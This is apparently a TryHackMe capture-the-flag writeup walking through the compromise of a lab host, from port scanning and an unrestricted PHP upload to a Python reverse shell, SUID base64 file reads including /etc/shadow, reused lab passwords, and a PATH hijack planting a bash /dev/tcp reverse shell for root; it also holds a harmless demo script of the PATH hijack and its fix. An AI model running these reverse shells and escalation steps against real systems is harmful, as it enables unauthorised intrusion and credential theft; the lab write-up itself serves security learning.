Cybherius

Start with a full TCP port sweep (all 65535 ports, high packet rate, host discovery skipped because ICMP is often filtered):

nmap -p- --min-rate 10000 10.10.128.57 -Pn

Once the open ports are known, run a more thorough scan against only those ports:

nmap -A -sC -sV -p21,22,80 10.10.128.57 -Pn

(-A already enables version detection and the default scripts, so -sC -sV is redundant here, but harmless.)

Ports 21 (FTP), 22 (SSH) and 80 (HTTP) are open. The FTP server accepts anonymous login.

Directory brute-forcing with gobuster (common wordlist, .php extension appended) finds index.php:

gobuster dir -u 'http://10.10.128.57/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 10 -x php

Its page source contains an HTML comment with a hint:

<!-- The Caspian tide carries secrets: /caspian_spark -->

ChatGPT helped interpret the hint in the source code.

Following the hint leads to this URL:

http://10.10.128.57/caspian_spark/flame_rise/echoes_of_stones/

Download the file served there (final_artifact.png) and inspect its metadata with exiftool; the output contains the next path:

exiftool final_artifact.png

# http://target-ip/baku_314/vault/

Under that path is an upload form:

http://10.10.128.57/baku_314/vault/upload.php

The upload handler does not restrict the file type, so a PHP file can be uploaded and then requested, which gives command execution as the web server user.

alt text

Through that command execution, launch a reverse shell back to the attacking machine (10.2.12.215, with a netcat listener waiting on port 1337):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.12.215",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Upgrade the dumb shell to a fully interactive TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash

Next, transfer linpeas.sh to the target. On the attacking machine, serve it over HTTP:

python3 -m http.server --bind 10.2.12.215 8080

On the target, fetch it:

wget http://10.2.12.215:8080/linpeas.sh

Among linpeas' findings is an unusual SUID binary:

/usr/bin/base64

Because it runs with root privileges, it can read any file: encode the file with the SUID base64 and decode it with a normal, unprivileged invocation (the GTFOBins SUID file-read trick).

First flag.

cat /flag.txt

hint.txt points to https://github.com/cybherius/PetrolRegistry. Running the Python script in that repository prints a password:

python3 Neftci.py

# password: BakuBlackGold2025!

This is the password of the neftci user on the target:

neftci : BakuBlackGold2025!

For a stable login, add an attacker-controlled public key to neftci's authorized_keys and connect via SSH.

The repository's commit history also reveals the password of a zip file:

petrol123

unzip flag.zip # use this password then read flag.txt

neftci's .bash_history contains another credential, this time for FTP:

neftci: NeftDashlari2025!

Logging into FTP with it yields three files.

Two of them are an SSH key pair, key and key.pub; the comment in key.pub shows it belongs to the khazar user. Use the private key to log in:

chmod 600 key
ssh -i key [email protected]

Flag 3, again via the SUID base64:

LFILE="/home/khazar/hidden_data/flag.txt"
/usr/bin/base64 "$LFILE" | base64 --decode

For escalation to root, run linpeas.sh again as khazar. The SUID base64 also exposes /etc/shadow (the hashes could be cracked offline, but they are not needed for what follows):

LFILE="/etc/shadow"
/usr/bin/base64 "$LFILE" | base64 --decode

linpeas also flags /usr/local/games/run. To analyse it locally, copy it out with the SUID base64 (the second base64 layer is redundant, since base64 output is already ASCII, which is why the file has to be decoded twice later):

LFILE="/usr/local/games/run"
/usr/bin/base64 "$LFILE" | base64 > /home/khazar/run_data

Serve run_data from the target over HTTP (python3 -m http.server, as used earlier for linpeas, works in this direction too), fetch it on the attacking machine and undo both encoding layers. Note that the target address differs from the earlier scans:

wget http://10.10.137.51:8080/run_data
cat run_data | base64 -d | base64 -d > run

Running strings over the binary and tracing its library calls with ltrace shows what it executes:

ltrace ./run

It invokes a player command by bare name, without an absolute path. The command is resolved through PATH, so a user-controlled directory placed first in PATH decides which player gets executed with the privileges of run.

Abuse the PATH environment variable: create a malicious player (a bash reverse shell to 10.2.12.215:1338, with a listener waiting there), put its directory first in PATH and run the binary:

cd /dev/shm
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.2.12.215/1338 0>&1' > player
chmod +x player
export PATH="/dev/shm:$PATH"
/usr/local/games/run
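To make the mechanism concrete, here is an added example (not from the writeup) that reproduces the PATH hijack on any Linux box without the room's SUID binary: a constructed stand-in for /usr/local/games/run that calls player by bare name, a planted player earlier in PATH, and the same program run with a fixed PATH to show what the hardening looks like. Both scripts are constructed for the demo.

```shell
#!/bin/sh
# Added example: PATH hijacking demonstrated with constructed stand-ins.
# "run" imitates /usr/local/games/run (calls "player" without a path);
# "player" stands in for the planted reverse-shell script.
set -e

# Create a work directory holding both scripts and print its path.
setup_demo() {
    work=$(mktemp -d)
    cat > "$work/run" <<'EOF'
#!/bin/sh
# Vulnerable pattern: the helper is resolved through the caller's PATH.
player
EOF
    cat > "$work/player" <<'EOF'
#!/bin/sh
# Planted command; the writeup puts a bash reverse shell here instead.
echo hijacked
EOF
    chmod +x "$work/run" "$work/player"
    printf '%s' "$work"
}

# Attacker-controlled directory first in PATH: "run" ends up executing
# the planted player. Returns "hijacked".
demo_path_hijack() {
    work=$(setup_demo)
    out=$(PATH="$work:$PATH" "$work/run")
    rm -rf "$work"
    printf '%s' "$out"
}

# Same program, but run with a fixed, trusted PATH (what a setuid program
# should set for itself, or it should call helpers by absolute path).
# The planted player is no longer found, so "run" fails. Returns "blocked".
demo_path_hijack_hardened() {
    work=$(setup_demo)
    if out=$(PATH=/usr/bin:/bin "$work/run" 2>/dev/null); then
        result=$out
    else
        result=blocked
    fi
    rm -rf "$work"
    printf '%s' "$result"
}
```

One caveat for the real payload: if the privileged program only changes its effective UID, a #!/bin/bash script drops it again (bash resets the effective UID to the real one unless started with -p), so use #!/bin/bash -p or a /bin/sh script in that case.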

The listener on 1338 receives a root shell.

About

TryHackMe room writeup.
